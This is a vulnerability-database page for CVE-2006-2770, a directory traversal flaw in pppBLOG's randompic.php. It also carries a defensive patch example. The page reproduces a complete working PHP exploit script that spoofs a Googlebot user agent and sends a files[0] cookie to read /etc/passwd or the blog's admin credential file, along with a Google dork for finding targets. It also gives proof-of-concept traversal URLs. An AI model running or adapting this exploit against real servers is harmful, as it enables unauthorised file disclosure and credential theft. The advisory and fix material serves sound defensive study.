CVE-2006-2770
CVSS 5.4
Published: 2006-06-02 06:18:00
Revised: 2017-07-19 21:31:45

[Original] Directory traversal vulnerability in randompic.php in pppBLOG 0.3.8 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) sequence in an index of the "file" array parameter, as demonstrated by file[0].


[CNNVD] PPPBlog Randompic.PHP Directory Traversal Vulnerability (CNNVD-200606-048)

        A directory traversal vulnerability exists in randompic.php in pppBLOG. When register_globals is enabled, a remote attacker can read arbitrary files via a .. (dot dot) sequence in an index of the "file" array parameter, for example file[0].

- CVSS (base score)

CVSS score: 5.4 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2770
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2770
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-048
(official data source) CNNVD

- Other links and resources

http://retrogod.altervista.org/pppblog_038_xpl.html
(UNKNOWN)  MISC  http://retrogod.altervista.org/pppblog_038_xpl.html
http://securityreason.com/securityalert/1015
(UNKNOWN)  SREASON  1015
http://securitytracker.com/id?1016198
(UNKNOWN)  SECTRACK  1016198
http://www.securityfocus.com/archive/1/archive/1/435406/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060530 pppBlog <= 0.3.8 administrative credentials/system disclosure
http://www.securityfocus.com/bid/18189
(UNKNOWN)  BID  18189
http://www.vupen.com/english/advisories/2006/2085
(UNKNOWN)  VUPEN  ADV-2006-2085
https://exchange.xforce.ibmcloud.com/vulnerabilities/26969
(UNKNOWN)  XF  pppblog-randompic-directory-traversal(26969)

- Vulnerability information

PPPBlog Randompic.PHP Directory Traversal Vulnerability
Medium severity  Path traversal
2006-06-02 00:00:00 2006-06-02 00:00:00
Remote
        A directory traversal vulnerability exists in randompic.php in pppBLOG. When register_globals is enabled, a remote attacker can read arbitrary files via a .. (dot dot) sequence in an index of the "file" array parameter, for example file[0].

- Advisories and patches

        No data yet

- Vulnerability information (1853)

pppBlog <= 0.3.8 (randompic.php) System Disclosure Exploit (EDBID:1853)
php webapps
2006-05-31 Verified
0 rgod
N/A
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "pppBlog <= 0.3.8 system disclosure exploit\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "dork: intext:\"Powered by pppblog\"\r\n\r\n";
/*
works with:
register_globals=On
*/

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path path_to_file OPTIONS\r\n";
echo "host:         target server (ip/hostname)\r\n";
echo "path:         path to pppblog\r\n";
echo "path_to_file: a file which you want to see content of\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /pppblog/ ../../../../../../etc/passwd\r\n";
echo "php ".$argv[0]." localhost /pppblog/ ../config/admin.php -p81\r\n";
echo "php ".$argv[0]." localhost / ../config/admin.php -P1.1.1.1:80\r\n\r\n";
die;
}
/* software site: http://joerg.jo.funpic.org/pppblog/static.php?page=welcome

vulnerable code in randompic.php at lines 66-68:
...
header("Content-Type: image/gif");
header("Content-Transfer-Encoding: binary");
readfile("$dir/$files[$randnum]");
...

if randompic.php is called directly, without arguments, $files array is
not initialized, so , if register_globals = On, you can see all
files on target server, according to open_basedir restrictions, poc:

http://[target]/[path]/randompic.php?files[0]=../config/admin.php

now at screen you have ppp-blog admin username/password pair, crypted by
crypt() php function
									      */

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$path_to_file=$argv[3];
if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
{die("Check the path, it must begin and end with a trailing slash\r\n");}
$port=80;
$proxy="";
for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}

$packet ="GET ".$p."randompic.php HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: files[0]=".urlencode($path_to_file)."\r\n"; //through cookies, log this :)
$packet.="Connection: Close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
echo $html;
?>

# milw0rm.com [2006-05-31]

- Vulnerability information (6972)

pppBlog <= 0.3.11 (randompic.php) File Disclosure Vulnerability (EDBID:6972)
php webapps
2008-11-03 Verified
0 JosS
N/A
# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability
# url: http://sourceforge.net/projects/pppblog/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# In memory of rgod ;)

*Requirements: register_globals = On

vulnerable code in randompic.php at lines 66-72:
...
header("Content-Type: image/gif");
header("Content-Transfer-Encoding: binary");
if (is_array($files)){
    if (is_file($files[$randnum])){
	readfile("$dir/$files[$randnum]");
    }
}
...

poc[0] = randompic.php?files[0]=[file]
poc[1] = randompic.php?files[0]=../../../../../../../../../../etc/passwd

linked: http://milw0rm.com/exploits/1853 (pppBlog 0.3.8, thanks rgod).

tested on localhost with register_globals = On.

Hack0wn :D

# milw0rm.com [2008-11-03]
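Both exploit-db entries above quote the same root cause: randompic.php never initialises $files itself, so with register_globals=On the request supplies it, and readfile("$dir/$files[$randnum]") follows whatever path is given. The 0.3.11 wrapper (is_array/is_file) does not close this, because is_file() is just as true for ../config/admin.php as for a real image. The following hardened image-selection routine is an added example, not pppBLOG's own code; the image directory, the allowed extensions and the function name are assumptions. It builds the candidate list server-side and verifies that the resolved path stays inside the image directory before readfile().

```php
<?php
// Hardened replacement for the randompic.php selection logic (added example,
// not pppBLOG code). $dir and the extension whitelist are assumptions.
function pick_random_image(string $dir): ?string
{
    // Resolve the image directory once; refuse to serve anything if it is missing.
    $base = realpath($dir);
    if ($base === false || !is_dir($base)) {
        return null;
    }

    // Key change versus 0.3.8/0.3.11: $files is always populated here from the
    // directory listing, so a request-supplied files[0] can never be used.
    $files = [];
    foreach (scandir($base) as $name) {
        // Plain file names only: no slashes, no "..", image extensions only.
        if (!preg_match('/^[A-Za-z0-9_-]+\.(gif|jpe?g|png)$/i', $name)) {
            continue;
        }
        if (is_file($base . DIRECTORY_SEPARATOR . $name)) {
            $files[] = $name;
        }
    }
    if (count($files) === 0) {
        return null;
    }

    $chosen = $files[random_int(0, count($files) - 1)];

    // Defence in depth: the canonical path must sit below $base. This is the
    // containment check that the 0.3.11 is_file() test lacks.
    $full   = realpath($base . DIRECTORY_SEPARATOR . $chosen);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// Assumed image directory for this blog instance.
$img = pick_random_image(__DIR__ . '/images');
if ($img === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: image/gif');
header('Content-Transfer-Encoding: binary');
readfile($img);
```

The same containment pattern (realpath, then prefix check against the canonical base directory) is the generic fix for any PHP readfile()/include() that is fed a user-influenced file name, independent of register_globals.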

- Vulnerability information

25924
pppBLOG randompic.php files[0] Parameter Traversal Arbitrary File Access
Remote / Network Access Input Manipulation
Exploit Public

- Vulnerability description
